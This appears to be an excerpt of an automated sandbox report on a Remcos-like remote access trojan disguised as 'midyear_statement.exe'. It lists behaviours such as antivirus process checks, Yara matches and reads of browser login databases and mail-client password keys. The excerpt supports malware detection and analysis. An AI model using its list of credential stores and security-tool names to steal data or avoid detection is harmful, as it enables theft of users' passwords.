Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\Libraries\wkrriuhD.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A9150 GetLocalTime, 0_2_040A9150
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234B60D GetComputerNameExW,GetUserNameW, 24_2_1234B60D
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_00401108 GetTimeZoneInformation, 24_2_00401108
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040AB6D0 GetVersionExA, 0_2_040AB6D0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 24_2_1233BA12
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: \key3.db 24_2_1233BB30
Source: C:\Users\Public\Libraries\wkrriuhD.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\Public\Libraries\wkrriuhD.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\Public\Libraries\wkrriuhD.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\wkrriuhD.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\Public\Libraries\wkrriuhD.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\wkrriuhD.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: ESMTPPassword 28_2_004033F0
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 28_2_00402DB3
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 28_2_00402DB3
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 8172, type: MEMORYSTR

Remote Access Functionality

Source: C:\Users\Public\Libraries\wkrriuhD.pif Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
Source: C:\Users\Public\Libraries\wkrriuhD.pif Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
Source: C:\Users\Public\Libraries\wkrriuhD.pif Mutex created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: cmd.exe 24_2_1233569A